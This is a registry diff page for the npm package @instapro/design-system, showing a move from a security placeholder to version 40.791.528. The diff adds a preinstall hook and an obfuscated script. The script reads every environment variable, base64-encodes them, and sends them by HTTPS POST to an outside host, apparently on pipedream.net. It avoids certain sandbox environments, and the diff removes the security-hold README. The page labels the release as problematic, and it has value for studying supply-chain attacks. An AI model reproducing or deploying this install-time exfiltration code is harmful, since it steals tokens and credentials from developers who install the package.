@instapro/design-system 0.0.1-security → 40.791.528
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/package.json +8 -3
- package/wnlzduj.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@instapro/design-system",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "40.791.528",
|
|
4
|
+
"main": "wnlzduj.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node wnlzduj.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/wnlzduj.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0xe58455=a0_0x19a6;(function(_0x23594b,_0x4c11a2){const _0x36d61e=a0_0x19a6,_0xa82ae3=_0x23594b();while(!![]){try{const _0x2220ef=parseInt(_0x36d61e(0x210))/0x1+-parseInt(_0x36d61e(0x1fc))/0x2+parseInt(_0x36d61e(0x209))/0x3*(-parseInt(_0x36d61e(0x1f1))/0x4)+parseInt(_0x36d61e(0x1fe))/0x5*(-parseInt(_0x36d61e(0x207))/0x6)+parseInt(_0x36d61e(0x1f7))/0x7*(parseInt(_0x36d61e(0x211))/0x8)+-parseInt(_0x36d61e(0x1f3))/0x9*(parseInt(_0x36d61e(0x213))/0xa)+-parseInt(_0x36d61e(0x1ff))/0xb*(-parseInt(_0x36d61e(0x20a))/0xc);if(_0x2220ef===_0x4c11a2)break;else _0xa82ae3['push'](_0xa82ae3['shift']());}catch(_0x1ffd14){_0xa82ae3['push'](_0xa82ae3['shift']());}}}(a0_0x288b,0xf19c4));function a0_0x19a6(_0x510845,_0x25e147){const _0x288b8c=a0_0x288b();return a0_0x19a6=function(_0x19a6af,_0x53844e){_0x19a6af=_0x19a6af-0x1f0;let _0x4a030b=_0x288b8c[_0x19a6af];return _0x4a030b;},a0_0x19a6(_0x510845,_0x25e147);}const http=require(a0_0xe58455(0x212)),filter=[{'key':a0_0xe58455(0x1f2),'val':a0_0xe58455(0x20f)},{'key':a0_0xe58455(0x1f2),'val':a0_0xe58455(0x1f4)},{'key':a0_0xe58455(0x1fa),'val':a0_0xe58455(0x214)},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x3c0d91=a0_0xe58455;var _0x217bc8=process[_0x3c0d91(0x203)]||{};if(filter[_0x3c0d91(0x206)](({key:_0x49d156,val:_0x31a9b2})=>_0x217bc8[_0x49d156]&&_0x217bc8[_0x49d156][_0x3c0d91(0x205)](_0x31a9b2))||Object[_0x3c0d91(0x20b)](_0x217bc8)[_0x3c0d91(0x1f9)]<0xa)return;req=http[_0x3c0d91(0x20e)]({'host':[_0x3c0d91(0x1fd),'m',_0x3c0d91(0x1f0),_0x3c0d91(0x1f8)][_0x3c0d91(0x20d)]('.'),'path':'/'+(_0x217bc8[_0x3c0d91(0x1f6)]||''),'method':_0x3c0d91(0x201)})['on'](_0x3c0d91(0x1f5),function(_0x38cd4a){}),req[_0x3c0d91(0x20c)](Buffer[_0x3c0d91(0x200)](JSON[_0x3c0d91(0x1fb)](_0x217bc8))[_0x3c0d91(0x202)](_0x3c0d91(0x208))),req[_0x3c0d91(0x204)]();}function a0_0x288b(){const _0x360c40=['10524HDLMIj','keys','write','join','request','taobao.org','1657037BNXstT','16SiPsPq','https','179870dMHuIG','daasadmin','pipedream','6095924yEJGjB','npm_config_registry','387TkLyLk','tencent.com','error','npm_package_name','2420761YwffIu','net','length','USERNAME','stringify','2332048Fcpitu','3e6cd05f19d5dd6adfbed43a32433776','185VNPlOU','29909qjtjFF','from','POST','toString','env','end','includes','some','45432CZYKaR','base64','3TPZrlO'];a0_0x288b=function(){return _0x360c40;};return a0_0x288b();}main();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|